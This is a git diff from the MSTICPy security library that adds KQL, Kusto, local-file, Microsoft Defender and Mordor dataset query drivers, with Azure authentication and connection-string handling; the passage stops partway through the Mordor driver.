+        mp_az_auth : Union[bool, str, list, None], optional
+            Optional parameter directing KqlMagic to use MSTICPy Azure authentication.
+            Values can be:
+            True or "default": use the settings in msticpyconfig.yaml 'Azure' section
+            str: single auth method name ('msi', 'cli', 'env' or 'interactive')
+            List[str]: list of acceptable auth methods from ('msi', 'cli',
+            'env' or 'interactive')
+        mp_az_tenant_id: str, optional
+            Optional parameter specifying a Tenant ID for use by MSTICPy Azure
+            authentication.
+
+        """
+        if not self._previous_connection:
+            print("Connecting...", end=" ")
+
+        mp_az_auth = kwargs.pop("mp_az_auth", "default")
+        mp_az_tenant_id = kwargs.pop("mp_az_tenant_id", None)
+
+        if isinstance(connection_str, WorkspaceConfig):
+            if not mp_az_tenant_id and "tenant_id" in connection_str:
+                mp_az_tenant_id = connection_str["tenant_id"]
+            connection_str = connection_str.code_connect_str
+
+        if not connection_str:
+            raise MsticpyKqlConnectionError(
+                f"A connection string is needed to connect to {self._connect_target}",
+                title="no connection string",
+            )
+        if "kqlmagic_args" in kwargs:
+            connection_str = connection_str + " " + kwargs["kqlmagic_args"]
+        # Default to using Azure Auth if possible.
+
+        if mp_az_auth and "try_token" not in kwargs:
+            self._set_az_auth_option(mp_az_auth, mp_az_tenant_id)
+
+        self.current_connection = connection_str
+        kql_err_setting = self._get_kql_option("short_errors")
+        self._connected = False
+        try:
+            self._set_kql_option("short_errors", False)
+            if self._ip is not None:
+                try:
+                    kql_exec(connection_str)
+                    if not self._previous_connection:
+                        print("connected")
+                except KqlError as ex:
+                    self._raise_kql_error(ex)
+                except KqlEngineError as ex:
+                    self._raise_kql_engine_error(ex)
+                except AuthenticationError as ex:
+                    self._raise_authn_error(ex)
+                except Exception as ex:  # pylint: disable=broad-except
+                    self._raise_adal_error(ex)
+                self._connected = True
+                self._previous_connection = True
+                self._schema = self._get_schema()
+            else:
+                print(f"Could not connect to kql query provider for {connection_str}")
+            return self._connected
+        finally:
+            self._set_kql_option("short_errors", kql_err_setting)
+
+    # pylint: disable=too-many-branches
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        """
+        Return current data schema of connection.
+
+        Returns
+        -------
+        Dict[str, Dict]
+            Data schema of current connection.
+
+        """
+        return self._schema
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        if query_source:
+            try:
+                table = query_source["args.table"]
+            except KeyError:
+                table = None
+            if table:
+                if " " in table.strip():
+                    table = table.strip().split(" ")[0]
+                if table not in self.schema:
+                    raise MsticpyNoDataSourceError(
+                        f"The table {table} for this query is not in your workspace",
+                        " or database schema. Please check your this",
+                        title=f"{table} not found.",
+                    )
+        data, result = self.query_with_results(query, **kwargs)
+        return data if data is not None else result
+
+    # pylint: disable=too-many-branches
+    def query_with_results(
+        self, query: str, **kwargs
+    ) -> Tuple[pd.DataFrame, KqlResponse]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The kql query to execute
+
+        Returns
+        -------
+        Tuple[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) and
+            Kql ResultSet.
+
+        """
+        debug = kwargs.pop("debug", self._debug)
+        if debug:
+            print(query)
+
+        self._make_current_connection()
+
+        # save current auto_dataframe setting so that we can set to false
+        # and restore current setting
+        auto_dataframe = self._get_kql_option(option="auto_dataframe")
+        self._set_kql_option(option="auto_dataframe", value=False)
+
+        # run the query (append semicolon to prevent default output)
+        if not query.strip().endswith(";"):
+            query = f"{query}\n;"
+
+        result = kql_exec(query)
+        self._set_kql_option(option="auto_dataframe", value=auto_dataframe)
+        if result is not None:
+            if isinstance(result, pd.DataFrame):
+                return result, None
+            if hasattr(result, "completion_query_info") and (
+                int(result.completion_query_info.get("StatusCode", 1)) == 0
+                or result.completion_query_info.get("Text")
+                == "Query completed successfully"
+            ):
+                data_frame = result.to_dataframe()
+                if result.is_partial_table:
+                    print("Warning - query returned partial results.")
+                if debug:
+                    print("Query status:\n", "\n".join(self._get_query_status(result)))
+                return data_frame, result
+
+        return self._raise_query_failure(query, result)
+
+    def _make_current_connection(self):
+        """Switch to the current connection (self.current_connection)."""
+        try:
+            self.connect(self.current_connection)
+        except MsticpyKqlConnectionError:
+            self._connected = False
+        if not self.connected:
+            raise MsticpyNotConnectedError(
+                "Please run the connect() method before running a query.",
+                title=f"not connected to a {self._connect_target}",
+                help_uri=MsticpyKqlConnectionError.DEF_HELP_URI,
+            )
+
+    def _load_kql_magic(self):
+        """Load KqlMagic if not loaded."""
+        # KqlMagic
+        print("Please wait. Loading Kqlmagic extension...", end="")
+        if self._ip is not None:
+            with warnings.catch_warnings():
+                warnings.simplefilter(action="ignore")
+                self._ip.run_line_magic("reload_ext", "Kqlmagic")
+        self._loaded = True
+        print("done")
+
+    def _is_kqlmagic_loaded(self) -> bool:
+        """Return true if kql magic is loaded."""
+        if self._ip is not None:
+            return self._ip.find_magic("kql") is not None
+        return bool(kql_exec("--version"))
+
+    @property
+    def _connect_target(self) -> str:
+        if self.environment == DataEnvironment.MSSentinel:
+            return "Workspace"
+        return "Kusto cluster"
+
+    @staticmethod
+    def _get_query_status(result) -> List[str]:
+        return [f"{key}: '{value}'" for key, value in result.completion_query_info]
+
+    @staticmethod
+    def _get_schema() -> Dict[str, Dict]:
+        return kql_exec("--schema")
+
+    @staticmethod
+    def _get_kql_option(option):
+        """Retrieve a current Kqlmagic notebook option."""
+        return kql_exec(f"--config {option}").get(option)
+
+    @staticmethod
+    def _set_kql_option(option, value):
+        """Set a Kqlmagic notebook option."""
+        opt_val = f"'{value}'" if isinstance(value, str) else value
+        return kql_exec(f"--config {option}={opt_val}")
+
+    def _set_kql_cloud(self):
+        """If cloud is set in Azure Settings override default."""
+        # Check that there isn't a cloud setting in the KQLMAGIC env var
+        kql_config = os.environ.get("KQLMAGIC_CONFIGURATION", "")
+        if "cloud" in kql_config:
+            # Set by user - we don't want to override this
+            kql_cloud = self._get_kql_option("cloud")
+            az_cloud = _AZ_CLOUD_MAP.get(kql_cloud, "public")
+            return kql_cloud, az_cloud
+        az_cloud = AzureCloudConfig().cloud
+        kql_cloud = _KQL_CLOUD_MAP.get(az_cloud, "public")
+        if kql_cloud != self._get_kql_option("cloud"):
+            self._set_kql_option("cloud", kql_cloud)
+        return kql_cloud, az_cloud
+
+    @staticmethod
+    def _format_datetime(date_time: datetime) -> str:
+        """Return datetime-formatted string."""
+        return date_time.isoformat(sep="T") + "Z"
+
+    @staticmethod
+    def _format_list(param_list: Iterable[Any]):
+        """Return formatted list parameter."""
+        fmt_list = []
+        for item in param_list:
+            if isinstance(item, str):
+                fmt_list.append(f"'{item}'")
+            else:
+                fmt_list.append(f"{item}")
+        return ",".join(fmt_list)
+
+    @staticmethod
+    def _raise_query_failure(query, result):
+        """Raise query failure exception."""
+        err_contents = []
+        if hasattr(result, "completion_query_info"):
+            q_info = result.completion_query_info
+            if "StatusDescription" in q_info:
+                err_contents = [
+                    f"StatusDescription {q_info.get('StatusDescription')}",
+                    f"(err_code: {result.completion_query_info.get('StatusCode')})",
+                ]
+            elif "Text" in q_info:
+                err_contents = [f"StatusDescription {q_info.get('Text')}"]
+            else:
+                err_contents = [f"Unknown error type: {q_info}"]
+        if not err_contents:
+            err_contents = ["Unknown query error"]
+
+        err_contents.append(f"Query:\n{query}")
+        raise MsticpyDataQueryError(*err_contents)
+
+    _WS_RGX = r"workspace\(['\"](?P<ws>[^'\"]+)"
+    _TEN_RGX = r"tenant\(['\"](?P<tenant>[^'\"]+)"
+
+    def _raise_kql_error(self, ex):
+        kql_err = json.loads(ex.args[0]).get("error")
+        if kql_err.get("code") == "WorkspaceNotFoundError":
+            ex_mssgs = [
+                "The workspace ID used to connect to Microsoft Sentinel could not be found.",
+                "Please check that this is a valid workspace for your subscription",
+            ]
+            ws_match = re.search(self._WS_RGX, self.current_connection, re.IGNORECASE)
+            if ws_match:
+                ws_name = ws_match.groupdict().get("ws")
+                ex_mssgs.append(f"The workspace id used was {ws_name}.")
+            ex_mssgs.append(f"The full connection string was {self.current_connection}")
+            raise MsticpyKqlConnectionError(*ex_mssgs, title="unknown workspace")
+        raise MsticpyKqlConnectionError(
+            "The service returned the following error when connecting",
+            str(ex),
+            title="Kql response error",
+        )
+
+    @staticmethod
+    def _raise_kql_engine_error(ex):
+        ex_mssgs = [
+            "An error was returned from Kqlmagic KqlEngine.",
+            "This can occur if you tried to connect to a second workspace using a"
+            + " different tenant ID - only a single tenant ID is supported in"
+            + " one notebook.",
+            "Other causes of this error could be an invalid format of your"
+            + " connection string",
+            *(ex.args),
+        ]
+        raise MsticpyKqlConnectionError(*ex_mssgs, title="kql connection error")
+
+    @staticmethod
+    def _raise_adal_error(ex):
+        """Adal error - usually wrong tenant ID."""
+        if ex.args and ex.args[0] == "Unexpected polling state code_expired":
+            raise MsticpyKqlConnectionError(
+                "Authentication request was not completed.",
+                title="authentication timed out",
+            )
+
+        err_response = getattr(ex, "error_response", None)
+        if err_response and "error_description" in ex.error_response:
+            ex_mssgs = ex.error_response["error_description"].split("\r\n")
+        else:
+            ex_mssgs = [f"Full error: {ex}"]
+        raise MsticpyKqlConnectionError(
+            *ex_mssgs, title="could not authenticate to tenant"
+        )
+
+    @staticmethod
+    def _raise_authn_error(ex):
+        """Raise an authentication error."""
+        ex_mssgs = [
+            "The authentication failed.",
+            "Please check the credentials you are using and permissions on the ",
+            "workspace or cluster.",
+            *(ex.args),
+        ]
+        raise MsticpyKqlConnectionError(*ex_mssgs, title="authentication failed")
+
+    @staticmethod
+    def _raise_unknown_error(ex):
+        """Raise an unknown exception."""
+        raise MsticpyKqlConnectionError(
+            "Another exception was returned by the service",
+            *ex.args,
+            f"Full exception:\n{ex}",
+            title="connection failed",
+        )
+
+    def _set_az_auth_option(
+        self, mp_az_auth: Union[bool, str, list, None], mp_az_tenant_id: str = None
+    ):
+        """
+        Build connection string with auth elements.
+
+        Parameters
+        ----------
+        mp_az_auth : Union[bool, str, list, None], optional
+            Optional parameter directing KqlMagic to use MSTICPy Azure authentication.
+            Values can be:
+            - True or "default": use the settings in msticpyconfig.yaml 'Azure' section
+            - auth_method: single auth method name ('msi', 'cli', 'env' or 'interactive')
+            - auth_methods: list of acceptable auth methods from ('msi', 'cli',
+                'env' or 'interactive')
+        mp_az_tenant_id: str, optional
+            Optional parameter specifying a Tenant ID for use by MSTICPy Azure
+            authentication.
+
+        """
+        # default to default auth methods
+        az_config = AzureCloudConfig()
+        auth_types = az_config.auth_methods
+        # override if user-supplied methods on command line
+        if isinstance(mp_az_auth, str) and mp_az_auth != "default":
+            auth_types = [mp_az_auth]
+        elif isinstance(mp_az_auth, list):
+            auth_types = mp_az_auth
+        # get current credentials
+        creds = az_connect(auth_methods=auth_types, tenant_id=mp_az_tenant_id)
+        if only_interactive_cred(creds.modern):
+            print("Check your default browser for interactive sign-in prompt.")
+
+        endpoint_uri = self._get_endpoint_uri()
+        endpoint_token_uri = f"{endpoint_uri}.default"
+        # obtain token for the endpoint
+        token = creds.modern.get_token(endpoint_token_uri)
+        # set the token values in the namespace
+
+        endpoint_token = {
+            "access_token": token.token,
+            "token_type": "Bearer",
+            "resource": endpoint_uri,
+        }
+        self._set_kql_option("try_token", endpoint_token)
+
+    def _get_endpoint_uri(self):
+        return _LOGANALYTICS_URL_BY_CLOUD[self.az_cloud]
diff --git a/msticpy/data/drivers/kusto_driver.py b/msticpy/data/drivers/kusto_driver.py
new file mode 100644
index 000000000..a6841bc4d
--- /dev/null
+++ b/msticpy/data/drivers/kusto_driver.py
@@ -0,0 +1,278 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Kusto Driver subclass."""
+from typing import Any, Dict, Optional, Union
+
+import pandas as pd
+
+from ...common.exceptions import MsticpyParameterError, MsticpyUserConfigError
+from ...common.provider_settings import get_provider_settings, ProviderArgs
+from ...common.utility import export
+from ..query_defns import DataEnvironment
+from .kql_driver import KqlDriver, QuerySource
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_KCS_CODE = "code;"
+_KCS_APP = "tenant='{tenant_id}';clientid='{client_id}';clientsecret='{clientsecret}';"
+_KCS_TEMPLATE = "azure_data-Explorer://{auth}cluster='{cluster}';database='{database}'"
+
+KustoClusterSettings = Dict[str, Dict[str, Union[str, ProviderArgs]]]
+
+
+@export
+class KustoDriver(KqlDriver):
+    """Kusto Driver class to execute kql queries for Azure Data Explorer."""
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        """
+        Instantiate KustoDriver.
+
+        Parameters
+        ----------
+        connection_str : str, optional
+            Connection string
+
+        Other Parameters
+        ----------------
+        debug : bool
+            print out additional diagnostic information.
+
+        """
+        super().__init__(connection_str=connection_str, **kwargs)
+        self.environment = kwargs.get("data_environment", DataEnvironment.Kusto)
+        self._connected = True
+        self._kusto_settings: KustoClusterSettings = _get_kusto_settings()
+        self._cluster_uri = None
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : str
+            Connect to a data source
+
+        Other Parameters
+        ----------------
+        cluster : str, optional
+            Short name or URI of cluster to connect to.
+        database : str, optional
+            Name of database to connect to.
+        kqlmagic_args : str, optional
+            Additional string of parameters to be passed to KqlMagic
+        mp_az_auth : Union[bool, str, list, None], optional
+            Optional parameter directing KqlMagic to use MSTICPy Azure authentication.
+            Values can be:
+            True or "default": use the settings in msticpyconfig.yaml 'Azure' section
+            str: single auth method name ('msi', 'cli', 'env' or 'interactive')
+            List[str]: list of acceptable auth methods from ('msi', 'cli',
+            'env' or 'interactive')
+        mp_az_tenant_id: str, optional
+            Optional parameter specifying a Tenant ID for use by MSTICPy Azure
+            authentication.
+
+        """
+        self.current_connection = self._get_connection_string(
+            connection_str=connection_str, **kwargs
+        )
+
+        mp_az_auth = kwargs.pop("mp_az_auth", None)
+        mp_az_tenant_id = kwargs.pop("mp_az_tenant_id", None)
+
+        if (
+            self._cluster_uri
+        ):  # This should be set by _get_connection_string called above
+            cluster_settings = self._kusto_settings.get(self._cluster_uri.casefold())
+            if cluster_settings:
+                if mp_az_auth is None and cluster_settings["integrated_auth"]:
+                    mp_az_auth = "default"
+                if mp_az_tenant_id is None and cluster_settings["tenant_id"]:
+                    mp_az_tenant_id = cluster_settings["tenant_id"]
+
+        kwargs.pop("cluster", None)
+        kwargs.pop("database", None)
+
+        super().connect(
+            connection_str=self.current_connection,
+            mp_az_auth=mp_az_auth,
+            mp_az_tenant_id=mp_az_tenant_id,
+            **kwargs,
+        )
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Other Parameters
+        ----------------
+        cluster : str, Optional
+            Supply or override the Kusto cluster name
+        database : str, Optional
+            Supply or override the Kusto database name
+        data_source : str, Optional
+            alias for `db`
+        connection_str : str, Optional
+
+
+        Returns
+        -------
+        Union[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        new_connection = self._get_connection_string(
+            query_source=query_source, **kwargs
+        )
+        if new_connection:
+            self.current_connection = new_connection
+        data, result = self.query_with_results(query)
+        return data if data is not None else result
+
+    def _get_connection_string(self, query_source: QuerySource = None, **kwargs):
+        """Create a connection string from arguments and configuration."""
+        # If the connection string is supplied as a parameter, use that
+        cluster = database = None
+        new_connection = kwargs.get("connection_str")
+        if not new_connection:
+            # try to get cluster and db from kwargs or query_source metadata
+            cluster = self._lookup_cluster(kwargs.get("cluster", ""))
+            database = kwargs.get("database")
+            if cluster and database:
+                new_connection = self._create_connection(
+                    cluster=cluster, database=database
+                )
+                self._cluster_uri = cluster
+        if not new_connection and query_source:
+            # try to get cluster and db from query_source metadata
+            cluster = cluster or query_source.metadata.get("cluster")
+            data_families = query_source.metadata.get("data_families")
+            if (
+                not isinstance(data_families, list) or len(data_families) == 0
+            ) and not self.current_connection:
+                # call create connection so that we throw an informative error
+                self._create_connection(cluster=cluster, database=database)
+            if "." in data_families[0]:  # type: ignore
+                _, qry_db = data_families[0].split(".", maxsplit=1)  # type: ignore
+            else:
+                # Not expected but we can still use a DB value with no dot
+                qry_db = data_families[0]  # type: ignore
+            database = database or qry_db
+            new_connection = self._create_connection(cluster=cluster, database=database)
+            self._cluster_uri = cluster
+        return new_connection
+
+    def _create_connection(self, cluster, database):
+        """Create the connection string, checking parameters."""
+        if not cluster or not database:
+            if cluster:
+                err_mssg = "database name"
+            elif database:
+                err_mssg = "cluster uri"
+            else:
+                err_mssg = "cluster uri and database name"
+            raise MsticpyParameterError(
+                f"Could not determine the {err_mssg} for the query.",
+                "Please update the query with the correct values or specify",
+                "explicitly with the 'cluster' and 'database' parameters to",
+                "this function.",
+                "In the query template these values are specified in the metadata:",
+                "cluster: cluster_uri",
+                "data_families: [ClusterAlias.database]",
+                title="Missing cluster or database names.",
+                parameter=err_mssg,
+            )
+        cluster_key = cluster.casefold()
+        if cluster_key not in self._kusto_settings:
+            raise MsticpyUserConfigError(
+                f"The cluster {cluster} was not found in the configuration.",
+                "You must have an entry for the cluster in the 'DataProviders section",
+                "of your msticyconfig.yaml",
+                "Expected format:",
+                "Kusto[-instance_name]:",
+                "  args:",
+                "    Cluster: cluster_uri",
+                "    Integrated: True",
+                "or",
+                "Kusto[-instance_name]:",
+                "  args:",
+                "    Cluster: cluster_uri",
+                "    TenantId: tenant_uuid",
+                "    ClientId: tenant_uuid",
+                "    ClientSecret: (string|KeyVault|EnvironmentVar:)",
+                title="Unknown cluster.",
+            )
+        return self._format_connection_str(cluster, database)
+
+    def _format_connection_str(self, cluster: str, database: str) -> Optional[str]:
+        """Return connection string with client secret added."""
+        fmt_items = self._kusto_settings.get(cluster.casefold())
+        if not fmt_items:
+            return None
+        fmt_items["database"] = database
+        if fmt_items.get("integrated_auth"):
+            auth_string = _KCS_CODE
+        else:
+            # Note, we don't add the secret until required at runtime to prevent
+            # it hanging around in memory as much as possible.
+            fmt_items["clientsecret"] = fmt_items["args"].get("ClientSecret")  # type: ignore
+            auth_string = _KCS_APP.format(**fmt_items)
+        return _KCS_TEMPLATE.format(auth=auth_string, **fmt_items)
+
+    def _lookup_cluster(self, cluster: str):
+        """Return cluster URI from config if cluster name is passed."""
+        if cluster.strip().casefold().startswith("https://"):
+            return cluster
+        for cluster_key, kusto_config in self._kusto_settings.items():
+            if cluster_key.startswith(f"https://{cluster.casefold()}."):
+                return kusto_config["cluster"]
+        return None
+
+    def _get_endpoint_uri(self):
+        if not self._cluster_uri.endswith("/"):
+            self._cluster_uri += "/"
+        return self._cluster_uri
+
+
+def _get_kusto_settings() -> KustoClusterSettings:
+    kusto_settings: KustoClusterSettings = {}
+    for prov_name, settings in get_provider_settings("DataProviders").items():
+        if not prov_name.startswith("Kusto"):
+            continue
+        instance = "Kusto"
+        if "-" in prov_name:
+            _, instance = prov_name.split("-", maxsplit=1)
+
+        cluster = settings.args.get("Cluster")
+        if not cluster:
+            raise MsticpyUserConfigError(
+                "Mandatory 'Cluster' setting is missing in msticpyconfig.",
+                f"the Kusto entry with the missing setting is '{prov_name}'",
+                title=f"No Cluster value for {prov_name}",
+            )
+        kusto_settings[cluster.casefold()] = {
+            "tenant_id": settings.args.get("TenantId"),  # type: ignore
+            "integrated_auth": settings.args.get("IntegratedAuth"),  # type: ignore
+            "client_id": settings.args.get("ClientId"),  # type: ignore
+            "args": settings.args,
+            "cluster": cluster,
+            "alias": instance,
+        }
+    return kusto_settings
diff --git a/msticpy/data/drivers/local_data_driver.py b/msticpy/data/drivers/local_data_driver.py
new file mode 100644
index 000000000..7b40c7f86
--- /dev/null
+++ b/msticpy/data/drivers/local_data_driver.py
@@ -0,0 +1,146 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Local Data Driver class - for testing and demos."""
+from pathlib import Path
+from typing import Union, Any, Dict, Optional, List
+
+import pandas as pd
+
+from .driver_base import DriverBase, QuerySource
+from ...common.pkg_config import settings
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class LocalDataDriver(DriverBase):
+    """LocalDataDriver class to execute kql queries."""
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        """
+        Instantiate LocalDataDriver and optionally connect.
+
+        Parameters
+        ----------
+        connection_str : str, optional
+            Connection string (not used)
+        data_paths : List[str], optional
+            Paths from which to load data files
+
+        """
+        del connection_str
+        self._debug = kwargs.get("debug", False)
+        super().__init__(**kwargs)
+
+        # If data paths specified, use these
+        data_paths = kwargs.get("data_paths")
+        self._paths: List[str] = ["."]
+        if data_paths:
+            self._paths = [path.strip() for path in data_paths]
+        elif "LocalData" in settings:
+            self._paths = settings.get("LocalData", {}).get("data_paths")
+
+        self.data_files: Dict[str, str] = self._get_data_paths()
+        self._schema: Dict[str, Any] = {}
+        self._loaded = True
+        self._connected = True
+        self.current_connection = "; ".join(self._paths)
+
+    def _get_data_paths(self) -> Dict[str, str]:
+        """Read files in data paths."""
+        data_files = {}
+        for path in self._paths:
+            for pattern in ["**/*.pkl", "**/*.csv"]:
+                found_files = list(Path(path).resolve().glob(pattern))
+                data_files.update(
+                    {
+                        str(file_path.name).casefold(): str(file_path)
+                        for file_path in found_files
+                        if file_path.is_file()
+                    }
+                )
+        return data_files
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : str
+            Connect to a data source
+
+        """
+        del connection_str
+        self._connected = True
+        print("Connected.")
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        """
+        Return current data schema of connection.
+
+        Returns
+        -------
+        Dict[str, Dict]
+            Data schema of current connection.
+
+        """
+        if self._schema:
+            return self._schema
+        for df_fname in self.data_files:
+            test_df = self.query(df_fname)
+            if not isinstance(test_df, pd.DataFrame):
+                continue
+            df_schema = test_df.dtypes
+            self._schema[df_fname] = {
+                key: dtype.name for key, dtype in df_schema.to_dict().items()
+            }
+
+        return self._schema
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        del kwargs
+        query_name = query_source.name if query_source else query
+        file_path = self.data_files.get(query.casefold())
+        if not file_path:
+            raise FileNotFoundError(
+                f"Data file ({query}) for query {query_name} not found."
+            )
+        if file_path.endswith("csv"):
+            return pd.read_csv(
+                file_path, infer_datetime_format=True, parse_dates=["TimeGenerated"]
+            )
+        data_df = pd.read_pickle(file_path)
+        if isinstance(data_df, pd.DataFrame):
+            return data_df
+        return f"{query} is not a DataFrame ({file_path})."
+
+    def query_with_results(self, query, **kwargs):
+        """Return query with fake results."""
+        return self.query(query, **kwargs), "OK"
diff --git a/msticpy/data/drivers/mdatp_driver.py b/msticpy/data/drivers/mdatp_driver.py
new file mode 100644
index 000000000..c71af3917
--- /dev/null
+++ b/msticpy/data/drivers/mdatp_driver.py
@@ -0,0 +1,110 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MDATP OData Driver class."""
+from typing import Union, Any
+import pandas as pd
+
+from .odata_driver import OData, QuerySource
+from ..query_defns import DataEnvironment, ensure_df_datetimes
+from ...common.azure_auth import AzureCloudConfig
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+@export
+class MDATPDriver(OData):
+    """KqlDriver class to retreive date from MS Defender APIs."""
+
+    CONFIG_NAME = "MicrosoftDefender"
+    _ALT_CONFIG_NAMES = ["MDATPApp"]
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        """
+        Instantiate MSDefenderDriver and optionally connect.
+
+        Parameters
+        ----------
+        connection_str : str, optional
+            Connection string
+
+        """
+        super().__init__(**kwargs)
+        api_uri, oauth_uri, api_suffix = _select_api_uris(self.data_environment)
+        self.add_query_filter("data_environments", "MDE")
+        self.add_query_filter("data_environments", "M365D")
+        self.add_query_filter("data_environments", "MDATP")
+
+        self.req_body = {
+            "client_id": None,
+            "client_secret": None,
+            "grant_type": "client_credentials",
+            "resource": api_uri,
+        }
+        self.oauth_url = oauth_uri
+        self.api_root = api_uri
+        self.api_ver = "api"
+        self.api_suffix = api_suffix
+
+        if connection_str:
+            self.current_connection = connection_str
+            self.connect(connection_str)
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        del query_source, kwargs
+        data, response = self.query_with_results(
+            query, body=True, api_end=self.api_suffix
+        )
+        if isinstance(data, pd.DataFrame):
+            # If we got a schema we should convert the DateTimes to pandas datetimes
+            if "Schema" not in response:
+                return data
+            date_fields = [
+                field["Name"]
+                for field in response["Schema"]
+                if field["Type"] == "DateTime"
+            ]
+            data = ensure_df_datetimes(data, columns=date_fields)
+            return data
+        return response
+
+
+def _select_api_uris(data_environment):
+    """Return API and login URIs for selected provider type."""
+    cloud_config = AzureCloudConfig()
+    login_uri = cloud_config.endpoints.active_directory
+    if data_environment == DataEnvironment.M365D:
+        return (
+            "https://api.security.microsoft.com/",
+            f"{login_uri}/{{tenantId}}/oauth2/token",
+            "/advancedhunting/run",
+        )
+    return (
+        "https://api.securitycenter.microsoft.com/",
+        f"{login_uri}/{{tenantId}}/oauth2/token",
+        "/advancedqueries/run",
+    )
diff --git a/msticpy/data/drivers/mordor_driver.py b/msticpy/data/drivers/mordor_driver.py
new file mode 100644
index 000000000..bc03cd054
--- /dev/null
+++ b/msticpy/data/drivers/mordor_driver.py
@@ -0,0 +1,935 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mordor/OTRF Security datasets driver."""
+import json
+import pickle  # nosec
+import zipfile
+from collections import defaultdict
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Dict, Generator, Iterable, List, Optional, Set, Tuple, Union
+from zipfile import BadZipFile, ZipFile
+
+import attr
+import pandas as pd
+import httpx
+import yaml
+from tqdm.auto import tqdm
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyNotConnectedError, MsticpyUserError
+from ...common.pkg_config import settings
+from ..query_source import QuerySource
+from .driver_base import DriverBase
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_MORDOR_TREE_URI = (
+    "https://api.github.com/repos/OTRF/Security-Datasets/git/trees/master?recursive=1"
+)
+
+_MITRE_JSON_URL = (
+    "https://raw.githubusercontent.com/mitre/cti/"
+    "master/enterprise-attack/enterprise-attack.json"
+)
+_MTR_TAC_CAT_URI = "https://attack.mitre.org/tactics/{cat}/"
+_MTR_TECH_CAT_URI = "https://attack.mitre.org/techniques/{cat}/"
+
+MITRE_TECHNIQUES: pd.DataFrame = None
+MITRE_TACTICS: pd.DataFrame = None
+
+_MITRE_TECH_CACHE = "mitre_tech_cache.pkl"
+_MITRE_TACTICS_CACHE = "mitre_tact_cache.pkl"
+_MORDOR_CACHE = "mordor_cache.json"
+
+
+# pylint: disable=too-many-instance-attributes
+class MordorDriver(DriverBase):
+    """Mordor data driver."""
+
+    def __init__(self, **kwargs):
+        """Initialize the Morder driver."""
+        super().__init__(**kwargs)
+        self.use_query_paths = False
+        self.has_driver_queries = True
+        self.mitre_techniques: pd.DataFrame
+        self.mitre_tactics: pd.DataFrame
+        self.mordor_data: Dict[str, MordorEntry]
+        self.mdr_idx_tech: Dict[str, Set[str]]
+        self.mdr_idx_tact: Dict[str, Set[str]]
+        self._driver_queries: List[Dict[str, Any]] = []
+
+        mdr_settings = settings.get("DataProviders", {}).get("Mordor", {})
+        self.use_cached = kwargs.pop(
+            "used_cached", mdr_settings.get("used_cached", True)
+        )
+        self.save_folder = kwargs.pop(
+            "save_folder", mdr_settings.get("save_folder", ".")
+        )
+        self.save_folder = _resolve_cache_folder(self.save_folder)
+        self.silent = kwargs.pop("silent", False)
+
+        self._loaded = True
+
+    # pylint: disable=global-statement
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : Optional[str]
+            Connect to a data source
+
+        """
+        global MITRE_TECHNIQUES, MITRE_TACTICS
+        cache_folder = self.save_folder if self.use_cached else None
+        print("Retrieving Mitre data...")
+
+        if MITRE_TECHNIQUES is None or MITRE_TACTICS is None:
+            MITRE_TECHNIQUES, MITRE_TACTICS = _get_mitre_categories(
